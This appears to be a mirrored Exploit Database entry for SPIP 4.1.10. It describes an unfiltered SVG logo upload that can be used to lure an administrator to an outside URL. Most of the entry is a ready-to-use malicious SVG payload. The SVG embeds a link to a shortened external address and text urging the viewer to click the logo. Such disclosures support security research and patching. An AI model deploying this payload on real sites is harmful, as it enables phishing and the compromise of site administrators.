spip v4.1.10 – Spoofing Admin account

• Exploit Database
• 101 阅读

• 作者： nu11secur1ty
  日期： 2023-07-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51557/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  ## Exploit Title: spip v4.1.10 - Spoofing Admin account ## Author: nu11secur1ty ## Date: 06.29.2023 ## Vendor: https://www.spip.net/en_rubrique25.html ## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip ## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/   ## Description: The malicious user can upload a malicious SVG file which file is not filtered by a security function, and he can trick the administrator of this system to check his logo by clicking on him and visiting, maybe a very dangerous URL. Wrong web app website logic, and not well sanitizing upload function.   STATUS: HIGH- Vulnerability   [+]Exploit: </code><code>SVG <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <defs> <linearGradient id="badgeGradient"> <stop offset="0"/> <stop offset="1"/> </linearGradient> </defs>   <g id="heading"> <a xlink:href= "https://rb.gy/74f0y"> <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4 23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6 18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0 12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C 7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2 0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5 2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9 12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8 18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C 24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6 31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4 29.9,22.3 29.6,22.8 z"/> <!--<text id="label" x="5" y="20" transform = "rotate(-15 10 10)">New</text>--> <text id="title" x="40" y="20">Please click on the logo, to see our design services, on our website, thank you!</text> </a> </g>   </svg> </code><code> ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)   ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)   ## Time spend: 00:37:00